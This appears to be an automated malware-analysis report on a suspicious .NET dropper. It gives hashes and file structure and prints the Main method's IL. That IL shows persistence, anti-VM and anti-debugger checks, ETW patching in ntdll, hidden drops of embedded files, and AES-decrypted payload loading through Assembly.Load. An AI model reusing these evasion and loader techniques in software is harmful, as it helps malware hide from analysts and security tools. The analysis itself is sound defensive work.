Suspicious
Suspect

d4aba6e3ebc2526be21e175ae34a06fc

PE Executable | MD5: d4aba6e3ebc2526be21e175ae34a06fc | Size: 1.38 MB | application/x-dosexec


Characteristics

Symbol Obfuscation Score

Medium

Hash
Hash Value
MD5
d4aba6e3ebc2526be21e175ae34a06fc
Sha1
0be9666108a047d52d406141a8a28e40ff9de858
Sha256
6e6e691a7f98fc4086f2bec28b34b2474ab783e9408c611e789a00107a24c227
Sha384
270dba07b977811e980a1fcdbe203a1d52da5a1053747550bbe3d60eaca3654b07d42062c0f53a258db0e803f7e6c4be
Sha512
4face9ba2c6d5875ef0ed3471701c318d7de6cd604fd95495c6e129e3b265847a9370b97f5276de3365be1c91cc7c345531210256e8d4113456b010064b85b10
SSDeep
24576:4/KrQdQ3MD6X13W7Qr5eGxmqKbOBhofZGzbgkbbK+UibpR5elZRHN:4/Krle6X13W8r5eRqKbOBWf8bxvpR0l/
TLSH
585533D18F7045D5D5B196B0394CAB98A436F4344410AFAE88DCEE7DB32C9E26D3AB31

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
  DosHeader
  PE Header
  Optional Header (x86)
  Section Headers
    .text
    .rsrc
    .reloc
  Resources
    RT_VERSION
      ID:0001
        ID:0
    RT_MANIFEST
      ID:0001
        ID:0
  .Net Resources
    payload.exe
Information
Name: Value
Module Name: PIAhbwggsQ.tmp
Full Name: PIAhbwggsQ.tmp
EntryPoint: System.Void eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::Main(System.String[])
Scope Name: PIAhbwggsQ.tmp
Scope Type: ModuleDef
Kind: Console
Runtime Version: v4.0.30319
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: PIAhbwggsQ
Assembly Version: 0.0.0.0
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: <null>
Total Strings: 31
Main Method: System.Void eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::Main(System.String[])
Main IL Instruction Count: 272

Main IL

call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() pop <null> call System.String System.Console::get_Title() call System.Boolean eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::IsStartup(System.String) stloc.0 <null> ldloc.0 <null> brtrue.s IL_0028: leave.s IL_0043 call System.String System.Console::get_Title() call System.Void eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::InstallStartup(System.String) leave.s IL_0043: ldstr "Select * from Win32_ComputerSystem" stloc.1 <null> ldloc.1 <null> callvirt System.String System.Object::ToString() call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String) pop <null> call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Void System.Diagnostics.Process::Kill() leave.s IL_0043: ldstr "Select * from Win32_ComputerSystem" ldstr Select * from Win32_ComputerSystem newobj System.Void System.Management.ManagementObjectSearcher::.ctor(System.String) stloc.2 <null> ldloc.2 <null> callvirt System.Management.ManagementObjectCollection System.Management.ManagementObjectSearcher::Get() stloc.3 <null> ldloc.3 <null> callvirt System.Management.ManagementObjectCollection/ManagementObjectEnumerator System.Management.ManagementObjectCollection::GetEnumerator() stloc.s V_18 br IL_00E4: ldloc.s V_18 ldloc.s V_18 callvirt System.Management.ManagementBaseObject System.Management.ManagementObjectCollection/ManagementObjectEnumerator::get_Current() stloc.s V_4 ldloc.s V_4 ldstr Manufacturer callvirt System.Object System.Management.ManagementBaseObject::get_Item(System.String) callvirt System.String System.Object::ToString() callvirt System.String System.String::ToLower() stloc.s V_5 ldloc.s V_5 ldstr microsoft corporation call System.Boolean System.String::op_Equality(System.String,System.String) 
brfalse.s IL_00B3: ldloc.s V_5 ldloc.s V_4 ldstr Model callvirt System.Object System.Management.ManagementBaseObject::get_Item(System.String) callvirt System.String System.Object::ToString() callvirt System.String System.String::ToUpperInvariant() ldstr VIRTUAL callvirt System.Boolean System.String::Contains(System.String) brtrue.s IL_00DE: ldc.i4.1 ldloc.s V_5 ldstr vmware callvirt System.Boolean System.String::Contains(System.String) brtrue.s IL_00DE: ldc.i4.1 ldloc.s V_4 ldstr Model callvirt System.Object System.Management.ManagementBaseObject::get_Item(System.String) callvirt System.String System.Object::ToString() ldstr VirtualBox call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_00E4: ldloc.s V_18 ldc.i4.1 <null> call System.Void System.Environment::Exit(System.Int32) ldloc.s V_18 callvirt System.Boolean System.Management.ManagementObjectCollection/ManagementObjectEnumerator::MoveNext() brtrue IL_0062: ldloc.s V_18 leave.s IL_00FE: ldloc.2 ldloc.s V_18 brfalse.s IL_00FD: endfinally ldloc.s V_18 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.2 <null> callvirt System.Void System.ComponentModel.Component::Dispose() ldc.i4.0 <null> stloc.s V_6 call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.IntPtr System.Diagnostics.Process::get_Handle() ldloca.s V_6 call System.Boolean eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::CheckRemoteDebuggerPresent(System.IntPtr,System.Boolean&) pop <null> call System.Boolean System.Diagnostics.Debugger::get_IsAttached() brtrue.s IL_012B: ldc.i4.m1 ldloc.s V_6 brtrue.s IL_012B: ldc.i4.m1 call System.Boolean eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::IsDebuggerPresent() brfalse.s IL_0131: ldstr "ntdll.dll" ldc.i4.m1 <null> call System.Void System.Environment::Exit(System.Int32) ldstr ntdll.dll call System.IntPtr eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::LoadLibrary(System.String) stloc.s V_7 ldloc.s V_7 ldstr EtwEventWrite 
call System.IntPtr eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::GetProcAddress(System.IntPtr,System.String) stloc.s V_8 call System.Int32 System.IntPtr::get_Size() ldc.i4.8 <null> beq.s IL_016E: ldc.i4.1 ldc.i4.3 <null> newarr System.Byte stloc.s V_19 ldloc.s V_19 ldc.i4.0 <null> ldc.i4 194 stelem.i1 <null> ldloc.s V_19 ldc.i4.1 <null> ldc.i4.s 20 stelem.i1 <null> ldloc.s V_19 br.s IL_0181: stloc.s V_9 ldc.i4.1 <null> newarr System.Byte stloc.s V_20 ldloc.s V_20 ldc.i4.0 <null> ldc.i4 195 stelem.i1 <null> ldloc.s V_20 stloc.s V_9 ldloc.s V_8 ldloc.s V_9 ldlen <null> conv.i4 <null> conv.i8 <null> call System.UIntPtr System.UIntPtr::op_Explicit(System.UInt64) ldsfld System.UInt32 eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::PAGE_EXECUTE_READWRITE ldloca.s V_10 call System.Boolean eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::VirtualProtect(System.IntPtr,System.UIntPtr,System.UInt32,System.UInt32&) pop <null> ldloc.s V_9 ldc.i4.0 <null> ldloc.s V_8 ldloc.s V_9 ldlen <null> conv.i4 <null> call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32) ldloc.s V_8 ldloc.s V_9 ldlen <null> conv.i4 <null> conv.i8 <null> call System.UIntPtr System.UIntPtr::op_Explicit(System.UInt64) ldloc.s V_10 ldloca.s V_10 call System.Boolean eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::VirtualProtect(System.IntPtr,System.UIntPtr,System.UInt32,System.UInt32&) pop <null> ldstr payload.exe stloc.s V_11 call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() stloc.s V_12 ldloc.s V_12 callvirt System.String[] System.Reflection.Assembly::GetManifestResourceNames() stloc.s V_21 ldc.i4.0 <null> stloc.s V_22 br IL_0290: ldloc.s V_22 ldnull <null> stloc.s V_13 newobj System.Void eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::.ctor() stloc.s V_14 ldloc.s V_14 ldloc.s V_21 ldloc.s V_22 ldelem.ref <null> stfld System.String eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::name ldloc.s V_14 ldfld 
System.String eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::name ldloc.s V_11 call System.Boolean System.String::op_Equality(System.String,System.String) brtrue IL_028A: ldloc.s V_22 ldloc.s V_14 ldfld System.String eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::name ldstr UAC call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_028A: ldloc.s V_22 ldloc.s V_14 ldfld System.String eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::name ldstr .exe callvirt System.Boolean System.String::EndsWith(System.String) brtrue.s IL_0241: ldloc.s V_14 ldloc.s V_14 ldfld System.String eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::name ldstr .bat callvirt System.Boolean System.String::EndsWith(System.String) brfalse.s IL_028A: ldloc.s V_22 ldloc.s V_14 ldfld System.String eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::name ldloc.s V_14 ldfld System.String eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::name call System.Byte[] eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::dJcliLYAxGvdRLIssiNj(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.s V_14 ldfld System.String eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::name ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldloc.s V_13 brtrue.s IL_0279: ldloc.s V_13 ldloc.s V_14 ldftn System.Void eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ/<>c__DisplayClass2::<Main>b__0() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) stloc.s V_13 ldloc.s V_13 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) call System.Void System.Threading.Thread::Start() leave.s IL_028A: ldloc.s V_22 pop <null> leave.s IL_028A: ldloc.s V_22 ldloc.s V_22 ldc.i4.1 <null> add <null> stloc.s V_22 ldloc.s V_22 ldloc.s V_21 ldlen <null> conv.i4 <null> blt IL_01DF: ldnull ldloc.s 
V_11 call System.Byte[] eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::dJcliLYAxGvdRLIssiNj(System.String) ldstr 4W2BCCBs/6d91nambhXWRqj2tZMo3I/LTGCmWQclud4= call System.Byte[] System.Convert::FromBase64String(System.String) ldstr wiCH8dhQRUYtjjg4kNgwyA== call System.Byte[] System.Convert::FromBase64String(System.String) call System.Byte[] eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::EEjpeNGxXWTIgJWTrJtz(System.Byte[],System.Byte[],System.Byte[]) call System.Byte[] eBxajomucVZiswDIHMQW.KlkNGJgZhbtfkuANNklQ::immaBUXYWPVwBZrgcUJT(System.Byte[]) stloc.s V_15 ldc.i4.0 <null> newarr System.String stloc.s V_16 ldarg.0 <null> ldc.i4.0 <null> ldelem.ref <null> ldc.i4.1 <null> newarr System.Char stloc.s V_23 ldloc.s V_23 ldc.i4.0 <null> ldc.i4.s 32 stelem.i2 <null> ldloc.s V_23 callvirt System.String[] System.String::Split(System.Char[]) stloc.s V_16 leave.s IL_02E9: ldloc.s V_15 pop <null> leave.s IL_02E9: ldloc.s V_15 ldloc.s V_15 call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) callvirt System.Reflection.MethodInfo System.Reflection.Assembly::get_EntryPoint() stloc.s V_17 ldloc.s V_17 ldnull <null> ldc.i4.1 <null> newarr System.Object stloc.s V_24 ldloc.s V_24 ldc.i4.0 <null> ldloc.s V_16 stelem.ref <null> ldloc.s V_24 callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_031F: ret pop <null> ldloc.s V_17 ldnull <null> ldnull <null> callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_031F: ret ret <null>
